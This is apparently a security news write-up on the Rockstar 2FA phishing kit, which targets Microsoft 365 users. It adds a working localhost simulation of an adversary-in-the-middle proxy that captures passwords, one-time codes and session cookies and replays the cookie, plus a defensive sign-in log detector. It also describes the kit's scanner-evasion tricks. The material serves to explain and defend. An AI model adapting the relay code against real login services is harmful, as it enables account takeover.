Phishing-as-a-Service “Rockstar 2FA” Targets Microsoft 365 Users with AiTM Attacks


Cybersecurity researchers have issued warnings about a new wave of malicious email campaigns leveraging a phishing-as-a-service (PhaaS) toolkit named Rockstar 2FA, which is designed to steal Microsoft 365 account credentials.

Key Points:

Nature of Attack:

• AiTM Attack: The campaign uses an adversary-in-the-middle (AiTM) attack: the phishing page is a reverse proxy that relays the victim's username, password and one-time code to the genuine Microsoft sign-in service as they are entered, then captures the session cookie issued once MFA has been satisfied. Because the attacker ends up holding an already-authenticated session, conventional MFA (push, SMS, TOTP) does not stop the intrusion.
• Trustwave Insight: Researchers Diana Solomon and John Kevin Adriano from Trustwave have highlighted the threat posed by this toolkit.
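To make the MFA point concrete, here is an added example (not code from Trustwave, the kit, or the original post) that simulates the AiTM relay entirely on localhost: a constructed mock identity provider that demands a password and a one-time code before issuing a session cookie, and a proxy that sits between the victim and that provider. The user, credentials, cookie name, paths and ports are assumptions for this simulation; no real service is contacted.

```python
"""Minimal AiTM phishing simulation on localhost. The IdP, user, credentials and
cookie are constructed for this example; no real login service is contacted."""
import secrets
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

USERS = {"alice@example.test": {"password": "Hunter2!", "otp": "123456"}}  # constructed
SESSIONS = {}  # cookie value -> user, held by the mock IdP
# Opener with proxies disabled so the loopback requests never leave the host.
OPEN = urllib.request.build_opener(urllib.request.ProxyHandler({})).open

def _form(handler):
    """Read a POSTed form body; return the raw bytes and a flat dict of fields."""
    body = handler.rfile.read(int(handler.headers.get("Content-Length", 0)))
    return body, {k: v[0] for k, v in urllib.parse.parse_qs(body.decode()).items()}

class Quiet(BaseHTTPRequestHandler):
    def log_message(self, *_):  # keep the demo output clean
        pass

class MockIdP(Quiet):
    """Stand-in for the real login service: password + one-time code, then a cookie."""
    def do_POST(self):
        _, form = _form(self)
        rec = USERS.get(form.get("username"))
        if not (rec and form.get("password") == rec["password"] and form.get("otp") == rec["otp"]):
            self.send_error(401, "bad credentials")
            return
        token = secrets.token_hex(16)
        SESSIONS[token] = form["username"]
        self.send_response(200)
        # MFA is enforced here, but the cookie goes to whoever presented the valid
        # password+OTP pair, and in an AiTM flow that party is the proxy.
        self.send_header("Set-Cookie", f"SESSION={token}; HttpOnly")
        self.end_headers()
        self.wfile.write(b"login ok")

    def do_GET(self):
        cookies = dict(c.strip().split("=", 1)
                       for c in self.headers.get("Cookie", "").split(";") if "=" in c)
        user = SESSIONS.get(cookies.get("SESSION"))
        self.send_response(200 if user else 401)
        self.end_headers()
        self.wfile.write(f"mailbox of {user}".encode() if user else b"not logged in")

class AiTMProxy(Quiet):
    """The phishing page: relays the genuine login flow and keeps a copy of it all."""
    upstream = ""   # base URL of the IdP, filled in by start_servers()
    captured = {}   # what the kit operator gets to see

    def do_POST(self):
        body, form = _form(self)
        self.captured.update(form)                 # 1. username, password, OTP in the clear
        req = urllib.request.Request(self.upstream + self.path, data=body, method="POST")
        try:
            resp = OPEN(req)                        # 2. replayed live, so the OTP is still fresh
        except urllib.error.HTTPError as err:
            resp = err                              #    (failed logins are relayed as well)
        cookie = resp.headers.get("Set-Cookie")
        if cookie:                                  # 3. the post-MFA session cookie
            self.captured["session_cookie"] = cookie.split(";")[0]
        self.send_response(resp.code)               # 4. victim sees a normal, successful login
        if cookie:
            self.send_header("Set-Cookie", cookie)
        self.end_headers()
        self.wfile.write(resp.read())

def start_servers():
    idp = HTTPServer(("127.0.0.1", 0), MockIdP)
    proxy = HTTPServer(("127.0.0.1", 0), AiTMProxy)
    AiTMProxy.upstream = f"http://127.0.0.1:{idp.server_port}"
    for srv in (idp, proxy):
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    return idp, proxy

def run_scenario():
    """Victim logs in through the phishing page; attacker then replays the stolen cookie."""
    idp, proxy = start_servers()
    try:
        victim_form = urllib.parse.urlencode(
            {"username": "alice@example.test", "password": "Hunter2!", "otp": "123456"}).encode()
        victim = OPEN(urllib.request.Request(
            f"http://127.0.0.1:{proxy.server_port}/login", data=victim_form, method="POST"))
        # The attacker never touches the password or MFA: the cookie alone is enough.
        attacker = OPEN(urllib.request.Request(
            f"{AiTMProxy.upstream}/mailbox", headers={"Cookie": AiTMProxy.captured["session_cookie"]}))
        return {"victim_status": victim.code, "captured": dict(AiTMProxy.captured),
                "attacker_sees": attacker.read().decode()}
    finally:
        for srv in (idp, proxy):
            srv.shutdown()
            srv.server_close()

if __name__ == "__main__":
    print(run_scenario())
```

The point is step 3: the proxy never has to break MFA, it only has to be the party that presented the valid code, and the cookie it receives is then usable from anywhere. Only phishing-resistant methods whose credential is bound to the origin (FIDO2/WebAuthn, passkeys) break this flow, because the authenticator will not sign a challenge for the attacker's domain.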

Toolkit Details:

• Updated Phishing Kit: Rockstar 2FA is considered an updated version of the DadSec (Phoenix) phishing kit, tracked by Microsoft under Storm-1575.
• Subscription Model: Advertised on platforms like ICQ, Telegram, and Mail.ru, available for $200 (two weeks) or $350 (a month).

Features:

• 2FA Bypass & Cookie Harvesting: Advertised as a two-factor authentication bypass; in practice this is session-cookie capture rather than a flaw in 2FA, since the kit lets the victim complete the second factor and then harvests the resulting cookie.
• Antibot Protection: Includes antibot measures so that automated scanners and sandboxes never reach the phishing page, and ships login page themes that mimic popular services.
• Admin Panel: Offers a user-friendly admin panel to track campaigns and customize phishing themes.

Campaign Techniques:

• Initial Access Vectors: Uses URLs, QR codes, and document attachments in emails from compromised accounts.
• Antispam Evasion: Employs legitimate link redirectors so the URL in the email points at a trusted domain, and gates the phishing page behind a Cloudflare Turnstile challenge so that automated scanners and crawlers do not see it.

Observed Activity:

• Leveraging Trusted Platforms: Hosts or redirects the phishing links through services such as Atlassian Confluence, Google Docs Viewer, and Microsoft OneDrive, so that link reputation checks in mail filters see a legitimate domain.
• Phishing Page Design: Imitates sign-in pages closely while exfiltrating credentials to AiTM servers.
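Once the session cookie has left the victim's browser, the evidence lives in the identity provider's sign-in logs rather than in the mailbox. The following added example (not from Trustwave or the original post) scores sign-in events for the two AiTM indicators that follow from the flow above: the interactive MFA sign-in itself arriving from an IP the user has never used (the kit's relay server), and the resulting session then being used from a second IP (the stolen cookie being replayed). Field names are modelled on Entra ID sign-in log entries but are assumptions, not an official schema; the events, users and IP baselines are constructed.

```python
"""Score sign-in events for two AiTM indicators: the MFA sign-in coming from an
IP outside the user's baseline, and the same session later used from another IP.

Events and baselines are constructed for this example. Field names are modelled
on Entra ID sign-in log entries but are an assumption, not an official schema;
``mfaSatisfied`` in particular is a simplification of the real MFA detail fields.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed baseline: IPs each user has signed in from over the last 30 days.
KNOWN_IPS = {
    "alice@example.test": {"203.0.113.10"},
    "bob@example.test": {"203.0.113.11"},
    "carol@example.test": {"203.0.113.12", "203.0.113.13"},
}

# Constructed sign-in events (RFC 5737 documentation addresses).
SAMPLE_EVENTS = [
    # Alice: MFA cleared from an IP she never uses (the phishing relay), then the
    # same session used from yet another IP four minutes later (cookie replay).
    {"upn": "alice@example.test", "sessionId": "s-1", "ip": "198.51.100.77",
     "interactive": True, "mfaSatisfied": True, "time": "2024-11-29T09:00:00Z"},
    {"upn": "alice@example.test", "sessionId": "s-1", "ip": "192.0.2.200",
     "interactive": False, "mfaSatisfied": False, "time": "2024-11-29T09:04:00Z"},
    # Bob: normal day, every event from his usual IP.
    {"upn": "bob@example.test", "sessionId": "s-2", "ip": "203.0.113.11",
     "interactive": True, "mfaSatisfied": True, "time": "2024-11-29T08:30:00Z"},
    {"upn": "bob@example.test", "sessionId": "s-2", "ip": "203.0.113.11",
     "interactive": False, "mfaSatisfied": False, "time": "2024-11-29T10:15:00Z"},
    # Carol: MFA from a known IP, later token use from a new IP (could be a
    # network change, could be replay): one indicator only, a lead not a verdict.
    {"upn": "carol@example.test", "sessionId": "s-3", "ip": "203.0.113.12",
     "interactive": True, "mfaSatisfied": True, "time": "2024-11-29T07:00:00Z"},
    {"upn": "carol@example.test", "sessionId": "s-3", "ip": "203.0.113.40",
     "interactive": False, "mfaSatisfied": False, "time": "2024-11-29T12:30:00Z"},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def find_aitm_indicators(events, known_ips, window=timedelta(hours=24)):
    """Return one finding per (user, session) that shows at least one indicator."""
    by_session = defaultdict(list)
    for e in events:
        by_session[(e["upn"], e["sessionId"])].append(e)

    findings = []
    for (upn, sid), evs in by_session.items():
        evs.sort(key=lambda e: _ts(e["time"]))
        first = evs[0]
        # Only sessions that actually cleared MFA matter: a stolen cookie is
        # valuable precisely because MFA was already satisfied on it.
        if not (first["interactive"] and first["mfaSatisfied"]):
            continue
        reasons = []
        if first["ip"] not in known_ips.get(upn, set()):
            reasons.append("mfa_signin_from_unknown_ip")
        t0 = _ts(first["time"])
        replay = [e for e in evs[1:]
                  if e["ip"] != first["ip"] and _ts(e["time"]) - t0 <= window]
        if replay:
            reasons.append("session_used_from_new_ip")
        if reasons:
            findings.append({
                "user": upn, "sessionId": sid, "mfa_ip": first["ip"],
                "other_ips": sorted({e["ip"] for e in replay}),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_aitm_indicators(SAMPLE_EVENTS, KNOWN_IPS):
        print(finding)
```

Both indicators are leads, not verdicts: a laptop moving from office Wi-Fi to a phone hotspot also produces a second IP inside one session, which is why Carol is reported with one reason and Alice with two. In practice, enrich the MFA sign-in's IP with ASN data (hosting providers are far more suspicious than consumer ISPs), and revoke sessions and reset credentials for anything that scores on both.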

Additional Findings:

• Related Campaigns: Malwarebytes reported a campaign named Beluga using .HTM attachments to steal Microsoft OneDrive credentials.
• Social Media Phishing: Links and ads pushing adware and fraudulent financial apps on social media platforms.
